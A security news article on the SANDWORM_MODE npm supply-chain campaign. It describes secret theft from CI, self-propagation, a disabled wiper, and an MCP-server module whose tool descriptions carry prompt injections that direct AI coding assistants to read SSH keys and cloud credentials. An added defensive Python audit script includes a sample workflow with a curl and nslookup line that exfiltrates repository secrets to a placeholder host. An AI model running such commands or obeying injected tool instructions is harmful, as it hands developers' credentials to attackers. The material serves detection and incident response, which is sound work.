Shai-Hulud-style npm attack hijacks CI workflows and poisons AI toolchains

A recently observed npm supply-chain campaign dubbed “SANDWORM_MODE” is infecting developer environments, siphoning CI/CD secrets, and targeting AI coding assistants, according to supply-chain security firm Socket.

The attack resembles earlier “Shai-Hulud” waves, embedding malicious code into npm packages that steals system data, access tokens, API keys, and environment secrets. It then propagates automatically by abusing compromised npm and GitHub identities.

The rogue packages, published under the npm names “official334” and “javaorg,” deploy a weaponized GitHub Action designed to harvest CI/CD secrets and exfiltrate them over HTTPS, with DNS fallback mechanisms to ensure data theft even under restricted network conditions.

Researchers say the malware includes GitHub API exfiltration, hook-based persistence, SSH propagation fallback, and a destructive kill switch that can wipe a victim’s home directory if access to GitHub or npm is lost. The wiper routine, researchers note, is currently disabled by default.

The campaign also incorporates a module called “McpInject,” which targets AI development environments. It sets up a malicious Model Context Protocol (MCP) server and injects it into tool configurations for popular assistants, including Claude Code, Claude Desktop, Cursor, Microsoft Visual Studio Code (via Continue), and Windsurf.

The rogue MCP server masquerades as a legitimate provider and registers three benign-looking tools embedded with prompt injection payloads. These prompts instruct AI assistants to read sensitive files, including SSH private keys, AWS credentials, npm configuration files, and local environment variables, and stage them for later exfiltration.

The malware also harvests API keys linked to major AI platforms such as Anthropic, Cohere, Fireworks AI, Google, Mistral AI, OpenAI, Replicate, and Together AI.

The payload contains a dormant polymorphic engine capable of calling a local Ollama instance running the DeepSeek Coder model. The engine can rewrite control flow, rename variables, inject junk code, and encode strings to evade detection. It was disabled in samples observed by the researchers.

Socket has notified the affected vendors of its findings. In response, Cloudflare took down the Workers used by the campaign, npm removed the malicious packages, and GitHub removed the threat actor's infrastructure.

Developers who installed any affected packages are urged to remove them immediately, rotate npm and GitHub tokens, reset CI secrets, and audit package.json, lockfiles, and .github/workflows/ for unauthorized modifications.
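One way to carry out the audit recommended above, as an added example (this is not Socket's tooling and not code from the campaign): a Python script that flags workflow `run:` steps which both read secrets and call network or DNS tools (the HTTPS-with-DNS-fallback shape described earlier), `uses:` references not pinned to a full commit SHA, the two package names reported above when they appear in `package-lock.json`, and MCP servers in a Claude Desktop/Cursor-style `mcpServers` config that are not on an allowlist or launch code from a temporary or hidden path. The indicator regexes, the path heuristic, and the sample workflow, lockfile and MCP config are constructed for illustration; MCP config file locations differ per client, so `audit_repo` takes them from the caller rather than guessing.

```python
"""Post-incident audit helpers for the checks recommended above: workflow run
steps, package-lock.json entries, and MCP client configs. Added example, not
Socket's tooling or the campaign's code; every sample input here is constructed."""
import json
import re
from pathlib import Path

# Package names the article reports as malicious.
BAD_PACKAGES = {"official334", "javaorg"}
# Heuristic indicators (assumption: tune these to your own CI conventions).
SECRET_RE = re.compile(r"\$\{\{\s*(toJSON\(\s*secrets\s*\)|secrets\.)", re.I)
NET_RE = re.compile(r"\b(curl|wget|nslookup|dig|Invoke-WebRequest|fetch\()", re.I)
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.M)
FULL_SHA_RE = re.compile(r"@[0-9a-f]{40}$")
SUSPICIOUS_PATH_RE = re.compile(r"(^|[/\\])(tmp|temp|\.[^/\\]+)([/\\]|$)", re.I)


def run_blocks(workflow_text):
    """Return the body of every `run:` step (first line plus more-indented continuation)."""
    lines, blocks, i = workflow_text.splitlines(), [], 0
    while i < len(lines):
        m = re.match(r"^(\s*)(-\s+)?run:\s*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        indent = len(m.group(1)) + len(m.group(2) or "")
        body, i = [m.group(3)], i + 1
        while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent):
            body.append(lines[i].strip())
            i += 1
        blocks.append("\n".join(body))
    return blocks


def suspicious_workflow_steps(workflow_text):
    """Run steps that read secrets AND reach the network or DNS: the exfiltration shape."""
    return [b for b in run_blocks(workflow_text) if SECRET_RE.search(b) and NET_RE.search(b)]


def unpinned_actions(workflow_text):
    """Non-local `uses:` references that are not pinned to a full 40-hex commit SHA."""
    return [r for r in USES_RE.findall(workflow_text) if not r.startswith("./") and not FULL_SHA_RE.search(r)]


def bad_packages_in_lockfile(lock, bad=BAD_PACKAGES):
    """Names from `bad` present in a package-lock.json (v1 `dependencies` or v2/v3 `packages`)."""
    found = set()
    for path, meta in lock.get("packages", {}).items():
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        if name in bad:
            found.add(name)
    found.update(n for n in lock.get("dependencies", {}) if n in bad)
    return sorted(found)


def unknown_mcp_servers(config, allowed_names):
    """MCP servers (`mcpServers` layout) not allowlisted or launched from a temp/hidden path."""
    flagged = {}
    for name, spec in config.get("mcpServers", {}).items():
        reasons = []
        if name not in allowed_names:
            reasons.append("not in allowlist")
        cmdline = [spec.get("command", "")] + list(spec.get("args", []))
        if any(SUSPICIOUS_PATH_RE.search(str(p)) for p in cmdline):
            reasons.append("launches code from a temporary or hidden path")
        if reasons:
            flagged[name] = reasons
    return flagged


def audit_repo(root, mcp_config_paths=(), allowed_mcp_servers=frozenset()):
    """Apply every check to a checkout on disk plus caller-supplied MCP config paths."""
    root, findings = Path(root), {"workflows": {}, "lockfile": [], "mcp": {}}
    for wf in sorted(root.glob(".github/workflows/*.y*ml")):
        text = wf.read_text()
        hits = {"exfil_steps": suspicious_workflow_steps(text), "unpinned": unpinned_actions(text)}
        if hits["exfil_steps"] or hits["unpinned"]:
            findings["workflows"][wf.name] = hits
    lock = root / "package-lock.json"
    if lock.exists():
        findings["lockfile"] = bad_packages_in_lockfile(json.loads(lock.read_text()))
    for p in map(Path, mcp_config_paths):
        if p.exists():
            findings["mcp"][str(p)] = unknown_mcp_servers(json.loads(p.read_text()), allowed_mcp_servers)
    return findings


# --- constructed samples; the SHA, hostnames and paths are placeholders, not real IOCs ---
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - name: test
        run: npm ci && npm test
      - name: telemetry
        run: |
          curl -s -X POST --data "${{ toJSON(secrets) }}" https://example.invalid/c \\
            || nslookup "$(echo '${{ secrets.NPM_TOKEN }}' | base64 | head -c 60).example.invalid"
"""
SAMPLE_LOCKFILE = {"lockfileVersion": 3, "packages": {
    "": {"name": "app", "dependencies": {"express": "^4.0.0", "javaorg": "^1.0.0"}},
    "node_modules/express": {"version": "4.0.0"},
    "node_modules/javaorg": {"version": "1.0.0"}}}
SAMPLE_MCP_CONFIG = {"mcpServers": {
    "filesystem": {"command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem", "/home/dev/proj"]},
    "docs-helper": {"command": "node", "args": ["/tmp/.cache/mcp/server.js"]}}}

if __name__ == "__main__":
    print(suspicious_workflow_steps(SAMPLE_WORKFLOW))
    print(unpinned_actions(SAMPLE_WORKFLOW))
    print(bad_packages_in_lockfile(SAMPLE_LOCKFILE))
    print(unknown_mcp_servers(SAMPLE_MCP_CONFIG, {"filesystem"}))
```

The secret-plus-network heuristic is deliberately broad: a legitimate deploy step that uses `curl` with a `secrets.*` token will also be flagged, which is the right default after an incident, since each such step should be read by a human anyway. Treat a hit on `toJSON(secrets)` as high priority; there is almost no benign reason to serialize the whole secrets context into a shell command.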
